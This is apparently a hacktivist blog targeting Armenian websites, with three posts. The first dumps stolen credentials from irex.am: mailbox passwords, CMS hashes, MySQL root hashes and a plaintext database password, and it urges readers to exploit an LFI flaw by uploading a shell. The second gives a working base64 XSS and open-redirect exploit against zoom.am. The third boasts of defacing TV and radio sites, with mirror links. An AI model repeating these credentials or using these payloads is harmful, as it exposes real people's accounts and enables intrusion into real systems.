2008-12-26 03:40:04 2008-12-26 03:44:59 1 Düzenle Sil mailman@irex.am irex! Mailer irex.am/mailman@irex.am/ 131072000 irex.am 2009-08-11 15:49:58 2009-08-11 15:49:58 1 Düzenle Sil admin@irex.am sevachuk Sevak Harutyunyan irex.am/admin@irex.am/ 256000000 irex.am 2008-12-26 02:06:34 2009-06-12 01:38:59 1 Düzenle Sil psfp@irex.am psfp1234567 PSFP irex.am/psfp@irex.am/ 1048576000 irex.am 2010-08-09 09:43:31 2010-08-09 09:43:31 1 Düzenle Sil edmond@irex.am edmond789 Edmond Ghulyan irex.am/edmond@irex.am/ 1048576000 irex.am 2010-09-28 07:07:29 2010-09-28 07:07:29 1 Düzenle Sil tigran@irex.am ttigran Tigran irex.am/tigran@irex.am/ 1048576000 irex.am 2011-07-22 04:40:32 2011-07-22 04:40:32 1 User's : Düzenle Sil 1 Armen Petrosyan armenpm 66dfdc2bc4146c2c7ab4879700f804 Düzenle Sil 5 EPDArmenia EPDArmenia EPDArmenia IREXArmenia123!@# Düzenle Sil 4 Armen Petrosyan armenpm 66dfdc2bc4146c2c7ab4879700f804 Düzenle Sil 7 viewUser viewUser viewUser 94aa9a21833ea3b96ea84059c3b803 Düzenle Sil 8 viewUser viewUser viewUser 94aa9a21833ea3b96ea84059c3b803 Special PHPMYADMIN(MySQL) Users : Kod: Tam Metinler Host User Password Düzenle Sil localhost root *0D9A298D714FA9B944BC3625396549810F51AC1A Düzenle Sil localhost postfixadmin *0D9A298D714FA9B944BC3625396549810F51AC1A Düzenle Sil localhost pma Düzenle Sil localhost postfix *0D9A298D714FA9B944BC3625396549810F51AC1A Düzenle Sil localhost armen *816C4727178159A7A6BC2892EE9E313730336DB5 Open directory : http://www.irex.am/arm/programs/ Kod: $db_hostname = 'localhost'; $db_database = 'irexsite'; $db_username = 'armen'; $db_password = 'armen123#@!'; CMS-lərində LFİ var kim shell uplasa scripti çəkib vulnları tapıb 0day eləsin. Hamıya Uğurlar
Gönderen zaman: Hiç yorum yok:

26 Ağustos 2012 Pazar

ZOOM GRAPHICS XSS [B64] Vulnerability + Open Redirected

Bu Vulnu baku.am-da tapmışam. Düzdü Çoxu deyirdiki yani çətindir vurmaq sadəcə .php-dən ibarətdi filan. Amma sonra çox kiçik 1 yandanda bəxt demək olar araşdırma nəticəsində Vulnerable olduğun öyrəndim. MetaiZm ilə oturub dərinləşdirdik. Buyurun Vuln : Kod: +---------------------------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : ZOOM GRAPHICS XSS [B64] Vulnerability + Open Redirected # Date : 2012-08-19 # Author : Avatar Fearless # Official Site : http://zoom.am/ # Version : x.x.x [UnKnown] # Tested on : Windows 7 Ultimate x32 # Original Advisory : http://thefear.in/zoomam.txt # Contact : avatar@hiphopfan.com # Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/ # Greet`Z To : Meta +---------------------------------------------------------------------------------------------------------------------------------------------------+ [+] Vulnerable : http://site.tld/l.php?l=2&h=[base64 encode] [-] Exploit : Firstable You Will take a XSS Code. Example : '>. We Have to use only quote not Double quote because if we use than script will parse double quote. And we will encode this code to Base64 . Output : Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== So it will be like this : http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== It is just example [?] About : For More Info Contact me. [@] Respect To : All My Bro*S AA Team MF Team MKT Team +--------------------------------------------------------------------------------------------------------------------------------------------------- Sadəcə Packet Stormy nəsə vulnu qəbul eləmədi sözün düzü dediki "fix your formatting" yani nəsə səhv yazmışam dəyəndəki nəyi? dedilərki aşağıdakılara baxıb harda nəyi səhv yazdığını biləmmərik. Yəqin fərqli adminlərə rastladım zoom.am-da daha çox site var bu vulnla bağlı olan saytlar tapa bilərsiniz =) Uğurlar
Gönderen zaman: Hiç yorum yok:

Ermənistanın Televiziya kanalı FUCKED!

Xaçik Operation Part 5 Hacked By Avatar & Worm man http://karmentur.ru https://www.zone-h.org/mirror/id/18200386 http://golgeler.net/view-%3E39478 http://ethnostars.ru https://www.zone-h.org/mirror/id/18200378 http://golgeler.net/view-%3E39477 http://tvarm.ru/php2sec/fuck.html https://www.zone-h.org/mirror/id/18200394 http://golgeler.net/view-%3E39479 http://net.tvarm.ru/ http://arab-zone.net/mirror/179371/net.tvarm.ru http://golgeler.net/view-%3E39480 http://radio.tvarm.ru/ http://arab-zone.net/mirror/179372/radio.tvarm.ru/ http://golgeler.net/view-%3E39481 http://pay.tvarm.ru/fuck.html http://golgeler.net/view-%3E39482 http://arab-zone.net/mirror/179395/pay.tvarm.ru/fuck.html http://pastebin.com/fck4TjDu Tvarm.ru nu da botik vurdu heç üstündən yarım saat keçməmiş under construction elədilər
Gönderen zaman: Hiç yorum yok:
Kaydol: Kayıtlar (Atom)